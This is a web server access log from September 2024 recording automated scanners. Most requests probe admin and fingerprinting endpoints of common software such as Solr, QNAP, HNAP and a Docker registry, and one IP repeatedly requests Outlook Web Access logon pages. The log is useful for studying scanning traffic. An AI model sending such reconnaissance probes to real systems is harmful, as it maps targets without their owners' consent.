161.35.218.100 - - [02/Sep/2024:17:17:06 +0200] "GET / HTTP/1.0" 200 1155 "-" "-"
161.35.218.100 - - [02/Sep/2024:17:17:06 +0200] "GET /odinhttpcall1725290227 HTTP/1.1" 404 298 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
161.35.218.100 - - [02/Sep/2024:17:17:06 +0200] "GET / HTTP/1.0" 200 1155 "-" "-"
161.35.218.100 - - [02/Sep/2024:17:17:06 +0200] "POST /sdk HTTP/1.1" 404 279 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
161.35.218.100 - - [02/Sep/2024:17:17:06 +0200] "GET /HNAP1 HTTP/1.1" 404 281 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
161.35.218.100 - - [02/Sep/2024:17:17:06 +0200] "GET /evox/about HTTP/1.1" 404 286 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
161.35.218.100 - - [02/Sep/2024:17:17:07 +0200] "GET / HTTP/1.0" 200 1155 "-" "-"
161.35.218.100 - - [02/Sep/2024:17:17:07 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
164.90.220.56 - - [02/Sep/2024:17:17:07 +0200] "GET /v2/_catalog HTTP/1.1" 404 287 "-" "Go-http-client/1.1"
207.154.251.229 - - [02/Sep/2024:17:17:07 +0200] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 281 "-" "Go-http-client/1.1"
164.90.178.150 - - [02/Sep/2024:17:17:07 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 297 "-" "Go-http-client/1.1"
64.226.115.204 - - [02/Sep/2024:17:17:07 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
164.90.212.153 - - [02/Sep/2024:17:17:07 +0200] "GET /solr/admin/info/system HTTP/1.1" 404 298 "-" "Go-http-client/1.1"
164.90.212.153 - - [02/Sep/2024:17:17:07 +0200] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 292 "-" "Go-http-client/1.1"
195.56.55.225 - - [02/Sep/2024:17:17:11 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
209.38.206.87 - - [02/Sep/2024:17:18:15 +0200] "\x16\x03\x01" 501 - "-" "-"
209.38.206.87 - - [02/Sep/2024:17:18:15 +0200] "\x16\x03\x01" 501 - "-" "-"
209.38.206.87 - - [02/Sep/2024:17:18:15 +0200] "\x16\x03\x01" 501 - "-" "-"
195.56.55.225 - - [02/Sep/2024:17:19:15 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [02/Sep/2024:17:19:25 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mkk.zpok.hu/owa/ HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:17:19:25 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
165.227.171.176 - - [02/Sep/2024:17:19:55 +0200] "\x16\x03\x01" 501 - "-" "-"
165.227.171.176 - - [02/Sep/2024:17:19:55 +0200] "\x16\x03\x01" 501 - "-" "-"
165.227.171.176 - - [02/Sep/2024:17:19:55 +0200] "\x16\x03\x01" 501 - "-" "-"
52.76.71.100 - - [02/Sep/2024:17:20:23 +0200] "GET /favicon.ico HTTP/1.1" 404 287 "-" "Go-http-client/1.1"
164.90.220.56 - - [02/Sep/2024:17:21:10 +0200] "\x16\x03\x01\x01$\x01" 501 - "-" "-"
195.56.55.225 - - [02/Sep/2024:17:21:18 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [02/Sep/2024:17:22:20 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.kdomb.zpok.hu/owa/ HTTP/1.1" 404 299 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:17:22:20 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [02/Sep/2024:17:23:21 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:17:25:25 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
64.225.107.32 - - [02/Sep/2024:17:26:00 +0200] "\x16\x03\x01\x01$\x01" 501 - "-" "-"
212.95.49.158 - - [02/Sep/2024:17:27:23 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.etk.zpok.hu/owa/ HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:17:27:24 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.iris.zpok.hu/owa/ HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:17:27:24 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:17:27:25 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:17:27:26 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:17:27:27 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
